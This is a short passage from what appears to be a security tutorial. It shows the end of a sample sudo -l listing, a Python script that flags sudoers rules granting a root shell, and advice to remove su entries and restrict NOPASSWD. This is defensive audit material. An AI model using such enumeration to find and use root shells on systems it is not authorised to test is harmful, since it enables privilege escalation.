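    (root) /usr/bin/apt-get update, /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        tag = "NOPASSWD" if r["nopasswd"] else "password required"
        print(f"root shell via sudo: {r['command']} ({tag})")
```

The fix on the host side is to remove the su entry from sudoers (or from the group rule that grants it) and to restrict NOPASSWD to specific, non-interactive commands with fixed arguments, as the second constructed rule does.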